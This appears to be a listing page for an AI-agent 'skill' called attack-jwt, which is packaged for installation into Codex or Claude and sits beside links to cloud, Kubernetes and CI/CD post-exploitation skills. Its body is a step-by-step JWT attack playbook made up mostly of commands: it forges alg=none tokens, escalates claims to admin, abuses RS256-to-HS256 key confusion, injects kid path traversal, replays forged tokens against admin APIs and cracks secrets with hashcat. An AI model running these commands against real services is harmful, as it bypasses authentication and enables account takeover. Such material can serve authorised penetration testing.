Menu
JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping
Installer avec Codex ou Claude Copiez ce prompt, collez-le dans Codex, Claude ou un autre assistant, puis laissez-le vérifier la page du skill et l'installer pour vous.
Basé sur la classification professionnelle SOC
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-jwt |
| description | JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["jwt","authentication","web","token","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-287","CWE-347","CWE-345"] |
| chains_with | ["attack-idor-automation"] |
| prerequisites | [] |
| severity_boost | {"attack-idor-automation":"JWT tampering + IDOR = full account takeover"} |
Exploit JWT implementation weaknesses to bypass authentication, escalate privileges, or forge tokens.
# Automated JWT analysis and tamper token generation
attack_script jwt_tamper EYTOKEN --json-output
# Manual decode
echo "HEADER.PAYLOAD.SIG" | cut -d. -f1 | base64 -d 2>/dev/null
echo "HEADER.PAYLOAD.SIG" | cut -d. -f2 | base64 -d 2>/dev/null
Check for:
alg field): RS256, HS256, nonerole, is_admin, sub, exp, aud, isskid): SQL injection, path traversal potential# Generate alg=none token
attack_script jwt_tamper EYTOKEN --set-header alg=none
# Role escalation
attack_script jwt_tamper EYTOKEN --set role=admin --set-header alg=none
# User ID swap
attack_script jwt_tamper EYTOKEN --set sub=1 --set-header alg=none
# HS256 with known/weak key
attack_script jwt_tamper EYTOKEN --set role=admin --key "secret"
If server uses RS256, try signing with the public key as HS256 secret:
# Fetch public key
curl -s https://TARGET/.well-known/jwks.json
# Convert JWK to PEM and sign
attack_script jwt_tamper EYTOKEN --set role=admin --key "$(cat public.pem)" --set-header alg=HS256
# SQL injection via kid
attack_script jwt_tamper EYTOKEN --set-header "kid=../../../../../../dev/null" --key ""
# kid pointing to accessible file
attack_script jwt_tamper EYTOKEN --set-header "kid=/proc/sys/kernel/hostname"
# Test tampered token
curl -s -H "Authorization: Bearer TAMPERED_TOKEN" https://TARGET/api/admin/users
| Attack | Severity |
|---|---|
| alg=none accepted — auth bypass | Critical (P1) |
| Role escalation via claim tampering | Critical (P1) |
| RS256→HS256 key confusion | Critical (P1) |
| Weak signing key (crackable) | High (P2) |
| kid SQL injection | Critical (P1) |
| Expired tokens accepted | Medium (P3) |
attack_script jwt_tamper — automated decode/tamper/re-encodejwt_tool (external) — comprehensive JWT testinghashcat -m 16500 — JWT secret cracking